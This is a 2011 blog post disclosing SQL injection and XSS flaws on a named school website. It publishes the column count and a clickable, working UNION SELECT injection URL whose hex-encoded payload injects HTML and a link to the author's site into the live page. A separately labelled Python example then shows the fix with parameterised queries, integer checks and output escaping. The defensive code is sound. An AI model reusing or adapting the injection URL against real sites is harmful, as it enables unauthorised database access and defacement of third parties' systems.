Wednesday, February 16, 2011

Bug found at TVS Lakshmi school website!!!!!

[update]:
I have sent a mail to tvsmhss@tvslvs.com regarding this vulnerability and asked them to rectify it.



 
Hi t3ch viewers, I recently came across a bug at the TVS Lakshmi school website...
It has XSS and SQLi bugs, and all its major databases are visible, making it more vulnerable to hacking.


details:
site name: www.tvsmhss.org
bug: sqli
no. of columns: 7
visible text: 2 and 4

proof and demo:
To view proof and demo of the bug, click the link below:

http://www.tvsmhss.org/bulletinnews.php?id=-1%20union%20select%201,concat(0x52,0x65,0x63,0x65,0x6E,0x74,0x20,0x6E,0x65,0x77,0x73,0x20,0x66,0x72,0x6F,0x6D,0x20,0x74,0x68,0x65,0x20,0x73,0x63,0x68,0x6F,0x6F,0x6C,0x3A,0x0A,0x3C,0x68,0x31,0x3E,0x54,0x68,0x69,0x73,0x20,0x77,0x65,0x62,0x73,0x69,0x74,0x65,0x20,0x68,0x61,0x73,0x20,0x78,0x73,0x73,0x20,0x61,0x6E,0x64,0x20,0x73,0x71,0x6C,0x69,0x20,0x62,0x75,0x67,0x73,0x20,0x2E,0x2E,0x20,0x3A,0x28,0x20,0x2E,0x2E,0x0A,0x42,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x74,0x68,0x65,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x2E,0x2E,0x3C,0x62,0x72,0x2F,0x3E,0x0A,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x63,0x6C,0x69,0x63,0x6B,0x20,0x68,0x65,0x72,0x65,0x20,0x74,0x6F,0x20,0x67,0x6F,0x20,0x74,0x6F,0x20,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E),3,4,5,6,7--
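How a numeric `id` handler closes both bugs, as an added example that is not part of the original post or the site's code: the id is validated as an integer, bound as a query parameter, and the row is HTML-encoded on output. Python with sqlite3 stands in for the site's PHP and database, and the table, column and function names are hypothetical.

```python
import html
import sqlite3


def make_db():
    """Constructed stand-in for the news table: 7 columns, as the post reports.
    Table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, posted TEXT, "
        "body TEXT, author TEXT, category TEXT, views INTEGER)"
    )
    db.execute(
        "INSERT INTO news VALUES (1, 'Sports day', '2011-02-01', "
        "'Results <b>posted</b> in the hall', 'office', 'events', 0)"
    )
    return db


def parse_id(raw):
    """Accept only a short run of ASCII digits; reject everything else."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        return None
    return int(raw)


def render_news(db, raw_id):
    """Return (status, html) for a bulletinnews-style request."""
    news_id = parse_id(raw_id)
    if news_id is None:
        return 400, "<p>Bad request</p>"
    # Placeholder binding: the value travels as data and is never parsed as SQL.
    row = db.execute(
        "SELECT title, body FROM news WHERE id = ?", (news_id,)
    ).fetchone()
    if row is None:
        return 404, "<p>Not found</p>"
    title, body = row
    # Encode on output so database content cannot become markup in the page.
    return 200, "<h1>%s</h1><p>%s</p>" % (html.escape(title), html.escape(body))


if __name__ == "__main__":
    db = make_db()
    for raw in ("1", "2", "-1 union select 1,2,3,4,5,6,7--"):
        print(repr(raw), render_news(db, raw))
```

The binding alone stops the query from being rewritten; the integer check and output encoding are kept as separate layers so a mistake in one does not expose the others.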
